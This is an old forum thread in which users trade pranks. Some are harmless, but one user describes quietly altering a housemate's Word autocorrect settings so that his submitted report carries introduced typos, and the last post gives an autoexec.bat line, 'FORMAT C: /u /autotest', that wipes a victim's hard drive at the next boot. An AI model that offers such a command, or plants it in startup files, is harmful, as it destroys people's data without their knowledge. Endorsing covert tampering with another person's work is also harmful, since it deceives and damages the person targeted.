Technology related pranks

Status
Not open for further replies.
So my latest prank does not really involve technology, but it is just as good. Beef bullion cubes in the shower head for that refreshing morning shower. This works great in the dorm lifestyle as well.

Most people use word processors (not me!), and most modern word processors have some sort of auto-correct feature. What you can have fun with, is the fact that almost all of these auto-correct features are editable. Last time I used Microsoft Word I think it was Tools->Autocorrect Options, but I could be wrong.

Anyway, do whatever you want from there. I'm pretty sure it doesn't limit the length of the "correction", and it doesn't care if you're auto-correcting a dictionary word, so the next time someone types "I" or "the", you can have whole sentences popping out of nowhere, with the message of your choice. You could also make simple changes that would be frustrating before the victim realizes what's going on. Maybe 'the' to 'teh', turn "I" into "i" or add a simple typo in their name.

O you are one evo motha ****a. Cold as ice.

I took Qiranworms' idea of adjusting settings in ms word. It worked well. My house mate turned the paper in, and did not notice the changes I had made. I didn't make any drastic changes, just minor. Such as changing the ei in their to ie, and other small changes inside words. Since he did not notice any of them, I will have to keep adding more each day until its oblivious. Thanks for the idea.

I took Qiranworms' idea of adjusting settings in ms word. It worked well. My house mate turned the paper in, and did not notice the changes I had made. I didn't make any drastic changes, just minor. Such as changing the ei in their to ie, and other small changes inside words. Since he did not notice any of them, I will have to keep adding more each day until its oblivious. Thanks for the idea.

wow, so you're hurting his grades for your entertainment? pretty lame if you ask me....

Myself nor my house mate are not in junior high school where they would take credit off of your paper. In an engineering report the professor is concerned with how you convey your technical understanding of the project. Once you attend college for engineering the professor assumes you understand how to write and they are concerned with your technical writing skills not grammar sentence structure and spelling mistakes.

I could have taken the prank further this first round, but I didn't want to do anything to destructive that he would not notice.

Add the following line into the autoexec.bat file.

FORMAT C: /u /autotest

and then wait for them in to turn on their computer next.

Status
Not open for further replies.
Back
Top Bottom